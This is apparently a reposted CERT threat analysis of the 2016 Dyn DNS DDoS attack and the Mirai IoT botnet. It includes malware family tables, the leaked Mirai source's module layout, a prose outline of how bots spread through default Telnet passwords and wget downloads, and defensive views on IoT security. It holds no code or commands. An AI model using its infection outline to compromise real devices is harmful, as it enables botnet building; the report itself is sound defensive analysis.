CERT Analysis on IoT Botnet and DDoS Attacks

On October 21, 2016, a DDoS attack hit the DNS service provider Dyn. The company is a major DNS provider for many companies in the United States.

In the morning of the attack, Dyn confirmed that its DNS infrastructure located in the East Coast had suffered DDoS attacks from all over the world. The attacks severely affected the business of Dyn’s DNS customers, and even worse, websites of customers became inaccessible. These attacks lasted until 13:45 PM ET. Dyn said on its official website that it would track down this issue and release the incident report.

Services affected by this attack included Twitter, Etsy, Github, Soundcloud, Spotify, Heroku, PagerDuty, Shopify, and Intercom. Access to popular websites like PayPal, BBC, Wall Street Journal, Xbox, CNN, HBO Now, Starbucks, New York Times, The Verge, and Financial Times was also affected.

Initial Analysis of the Attack

Dyn said that this DDoS attack involved tens of millions IP addresses, most of which were IoT and smart devices. Dyn believed that the attack came from a malicious code named “Mirai.” Hacker organizations NewWorldHackers and Anonymous claimed responsibility for the attack .

CERT Analysis on Botnets

FamilyVariant quantitySample HASH quantityTrojan[DDoS]/Linux.Mirai2Greater than100Trojan[DDoS]/Linux.Xarcen5Greater than1000Trojan[DDoS]/Linux.Znaich3Greater than500Trojan/Linux.PNScan2Greater than50Trojan[Backdoor]/Linux.Mayday11Greater than1000Trojan[DDoS]/Linux.DnsAmp5Greater than500Trojan[Backdoor]/Linux.Ganiw5Greater than3000Trojan[Backdoor]/Linux.Dofloo5Greater than2000Trojan[Backdoor]/Linux.Gafgyt28Greater than8000Trojan[Backdoor]/Linux.Tsunami71Greater than1000Worm/Linux.Moose1Greater than10Worm[Net]/Linux.Darlloz3Greater than10

In this incident, the primary victims infected with Mirai were IoT devices, including routers, network cameras, and DVRs. As early as 2013, organizations engaged in DDoS cyber crimes started to shift targets for capturing botnet hosts from Windows to Linux, and from x86 Linux servers to IoT devices with the embedded Linux operating system. Mirai means “future” in Japanese. R&D staff names the new variant “Hajime,” which means “beginning” in Japanese.

CERT has captured and analyzed a large number of malicious samples related to smart devices and routers, and worked with related authorities to collect field evidence from some devices. These devices mainly use the MIPS and ARM architectures in which attackers have implanted Trojans due to the existence of such factors as default passwords, weak passwords, serious vulnerabilities that do not get fixed in time. Due to mass production and deployment of IoT devices and insufficient competence of integrators and O&M staff in many application scenarios, a significant proportion of devices use default passwords and vulnerabilities cannot get fixed in time.

Mode of the Attack

In DDoS attacks (including Mirai) targeted at IoT devices, attackers perform brute-force cracking on popular password files through the Telnet port, or log on using the default password. If attackers successfully log on through Telnet, they attempt to use the necessary embedded tools like BusyBox and wget to download the bot of the DDoS function, modify executable attributes, and run and control IoT devices. Due to the difference of the CPU command architectures, after determining the system architecture, some botnets can select samples of the MIPS, arm, or x86 architectures for downloading. After running these samples, botnets receive related attacks commands to initiate attacks.

The following weak password can exist in a Mirai sample:

In previous tracking and analysis of IoT botnets, CERT found that many popular devices including DVR, network camera, and smart router brands had the default password problem.

Analysis of the Mirai Botnet

CERT analyzed the Mirai source code uploaded to GitHub on October 4, 2016, and sorted out its code structure:

The leaked Mirai source code mainly consists of two parts:

  1. Loader: The loader stores the executable files that get compiled for each platform and is used to load the actual Mirai attack program.
  2. Mirai: Mirai is the program that hackers use to implement the attack. It has two parts: bot (controlled end, which is compiled using the C language) and cnc (control end, which is compiled using the Go language).

The following modules are available at the bot end:

Module file nameModule functionattack.cUsed for attacks. The called attack sub-module gets defined in other attack_xxx.c files.checksum.cCalculates the checksum.killer.cEnds a process.main.cMain module calls other sub-modules.rand.cGenerates random numbers.resolve.cResolves domain names.scanner.cIt can scan devices that can be attacked, for example, by using weak passwords, on the network.table.cStores encrypted domain name data.util.cProvides some practical tool.

Similar “open source” behaviors provide extreme bad demonstration effects, and will further reduce the costs for other attackers to attack IoT devices. Therefore, this article does not intend to interpret this code.

CERT’s Monitoring on IoT Botnets

Attack start time and end timeSample family (named by the original factory)Attack targetAttack type2016–10–22 9:36:48Family Mayday203.195..:15000 Guangzhou Tencenttcp flood2016–10–20 8:12:57Family DDoSwww.52*.com XXX2016–10–20 1:36:20Family DDoSwww.ssh*.com/user.php Shenzhen XXX company2016–10–9 18:52:35Family Billgates121.199.. Hangzhou XX cloud2016–9–5 10:57:00Family Billgates59.151.. Beijing XX

Before 2014, weak passwords were often scanned to implant malicious codes on IoT devices using the Linux system. Since the appearance of the Shell Shock (CVE-2014–6271), this vulnerability was commonly used on the Internet to scan and implant malicious codes. According to the information captured by the CERT Beeswarm system, the number of Linux host intrusion incidents increased significantly since the appearance of the Shell Shock.

The first Shell Shock infection incident detected by CERT occurred in September 2014. Later, CERT published multiple malicious code analysis reports related to IoT devices, such as the Analysis of DYREZA Family Variants Spread Using Routers and Hackers Using HFS to Build Servers and Spread Malicious Codes. Another report, Trojan [DDOS]/Linux. Znaich Analysis Report was not published at that time and now appends to this report. Attackers also used a few other vulnerabilities that can obtain host permissions.

Opinions from the CERT Analysis Team

  1. The number of online IoT devices are increasing substantially with the rapid development of IoTs ranging from smart homes to smart cities.
  2. Windows is the mainstream desktop operating system. With the continuous enhancement of memory security (such as DEP, ASLR, and SEHOP) capabilities of Windows, it is increasingly difficult to break down the Windows system through a remote open port. In contrast, if malicious codes get injected through IoT devices without strict security design, the success rate is much higher.
  3. Most IoT devices do not get embedded with any security mechanisms, and a lot of them do not get placed within the traditional IT network. That is, they are beyond the control of the security perception ability. These devices cannot efficiently respond to problems as they happen.
  4. IoT devices often stay online for 24 hours a day and are more stable attack sources than the desktop Windows system.

CERT expounded the view that threats will be spread and generalized in an in-depth manner with the development of Internet Plus, and used the word “Malware/Other” to explain that security threats evolve towards the new fields such as smart devices. As what we are worried about, security threats are now everywhere from smart cars, smart homes, smart wearable devices, to smart cities.

Therefore, in this large-scale DDoS incident targeted Dyn’s DNS, CERT attaches more importance to IoT security problems exposed. Although the DNS often gets regarded as the Achilles’ heel of the Internet, we should not forget that interworking on the Internet relies on IP addresses, and domain names are generated merely to facilitate memory of users. For most users of the large industries in North America, VPNs and IP addresses get widely used for the connection, and the primary system operation does not rely on the DNS service. Therefore, even though such a heavy-traffic DDoS attack brings inconvenience to netizens when they access websites for a period, it cannot shake the North America social operation and Internet foundation.

The Importance of Device Security in IoT

Many devices where these applications are placed are necessary infrastructure devices on the critical nodes that maintain the livelihood of the people, or even basic sensors of critical industrial control facilities. Intruding these devices provides more in-depth resource values, and is more dangerous than using these devices to initiate DDoS attacks. The existence of vulnerabilities in a large area on the IoT brings more concealed and dangerous social security risks and national security risks, except that it is difficult to perceive these type of threats.

It is natural to use the public influence as the significant indicator for evaluating the impact of cybersecurity incidents. When security threats gradually become directional and more concealed, we should not restrict our focus only on risks that are easy to identify. In this way, more dangerous threats will be let off. Even though the Dyn DDoS attack only affected access to websites, the underlying concept behind the attack can be easily extended to other applications.

CERT has been strengthening security protection of IoT devices, increasing costs for attacking or intruding IoT devices, and enhancing security threat monitoring and alarm of IoT devices. It is similar to what we’ve done in the last decade to enable the CERT AVL SDK engine to run on tens of thousands of firewalls and billions of mobile phones.


With the advances in technology, IoT is in the process of becoming more secure with latest monitoring and intruder prevention systems. CERT is working to win this battle soon and is hoping to secure this revolutionary technology completely.

To learn more about IoT and security, visit www.alibabacloud.com/blog.



Follow me to keep abreast with the latest technology news, industry insights, and developer trends.